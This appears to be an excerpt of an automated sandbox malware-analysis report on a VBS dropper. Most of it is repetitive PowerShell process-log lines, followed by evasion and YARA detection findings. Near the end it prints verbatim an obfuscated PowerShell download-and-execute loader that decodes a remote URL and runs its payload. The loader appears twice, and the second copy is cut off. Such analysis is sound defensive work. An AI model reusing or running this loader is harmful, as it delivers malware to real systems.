              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Potential evasive VBS script found (sleep loop)
              Source: Initial fileInitial file: Do While Mrkeliges.Status = 0 WScript.Sleep 100
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4710Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5211Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5254Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4579Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1532Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3840Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: PING.EXE, 00000001.00000002.2037382649.000001CFB5978000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll==pWP
              Source: powershell.exe, 00000004.00000002.2193263730.000002802E08F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_3136.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3136, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3228, type: MEMORYSTR
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcuJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#stelography boligministerielt surterhvervet polenkas #>;$genforeningerne='brasilianske';<#decoloriser quatrains dksmands rentabelt #>;$stvregne=$orlos+$host.ui; function udgangstilladelsernes($lupulus){if ($stvregne) {$setaria++;}$revest=$velkomstens74+$lupulus.'length'-$setaria; for( $kropsvisiteret=4;$kropsvisiteret -lt $revest;$kropsvisiteret+=5){$spoilage=$kropsvisiteret;$salvelsesfuldest+=$lupulus[$kropsvisiteret];$prototraitor='kronvildtjagterne';}$salvelsesfuldest;}function skilleliniens($knothead){ & ($toilettaskens) ($knothead);}$tastetryk=udgangstilladelsernes 'guttm ndsoun uzpoliicanal i clvotaadavi/ pen ';$tastetryk+=udgangstilladelsernes 'quar5skyd.mine0love ski.(li nwfejlimul nfabrdudklo nanwf.ans a,a procnb,get,lie stem1udru0 dr,.roug0raci;phra offiwcensiriddnnatu6oakl4be i;ne.r fenaxover6ea t4ur n;nume urinrgyptvfili:sta,1 eff3dest1clee.disa0tred)fi a handg noneyellcjustk siso,rep/frod2 sto0h.ms1stil0gest0 p.o1cert0wi t1buri dyrefselvidubbr g,ueh,mpf tr oumorxl,du/defl1conv3post1n ws.sikk0 bog ';$cellerne=udgangstilladelsernes 'embruo bys oppequarrerog-surfa ukkgbro e ivsn fortigna ';$konstruktivt=udgangstilladelsernes 'gru.haf,at arttb depkachshoo,:flit/be.a/ gamsbatiyh lvndeutema ipfinu.fl trtohaobef./skoslquacyspecsactib trgasandd vov. paupstr ss,anpskij ';$kropsvisiteretndarbejde97=udgangstilladelsernes 'olde>gang ';$toilettaskens=udgangstilladelsernes ' ympi .ree sa.x raf ';$lykkejgers='spendynr';$proconscriptive='\udviklingsegnes.sep';skilleliniens (udgangstilladelsernes ' npa$fuyeg cu le,aconaivbfinaaakvaltr,n:o.lltcytoaideamfra b ud uun,rrchicsblse=ozon$ kreskannp lwvglas: staa st pwordp la d aliasn.wt p.lau,fr+trau$frynpgnisr ,enoappecduelo.enenkgeusf.rhc r nroarliclump fletswo ilym.vrefeetysk ');skilleliniens (udgangstilladelsernes 'arbe$forbg penlhandominubfackala sl bil: unmkgardoindod eneelan k aresa skek.ogroml.=bajo$kl pknarcocrainsy gschert prerunusupr.lkprint s ai ealvsammtakti.anidsche,pthyml n niope.ttrun(hoo $svinkun.orcheco no ptilfs f,rvsvinifades .ryiberitstroeantir .elenonctskifn ferdforpa.ildrgipsbsan edampj fordmelaejor 9disi7insi)star ');skilleliniens (udgangstilladelsernes ' nov[,ufonfjlde rovtejen.sextshunke marr genv .kki c,ncdi hebronp,kspogadiifrowntndit,algminf aekspnveneaballg ungefastr gre]wa.r:u,co: molsapple kogc ,unuanterreanidm,it carykrafp e.er nheogardtlaurotahaccivionighllump rang=outb ,usk[ stan a.he ovet wif.gcelsformebondc,andus ilrartoi ukkttoroyparopdolorsubpopreitcheeofriecsrskolserl oddtunfoyd ospskypeeksp]sg f: amm:dry,tpomeladdos nab1dila2 le ');$konstruktivt=$kodekser[0];$slbemaalsflyvningens=(udgangstilladelsernes 'buat$,utwgvinells lo ,aabmuriagravlt.ia:up om 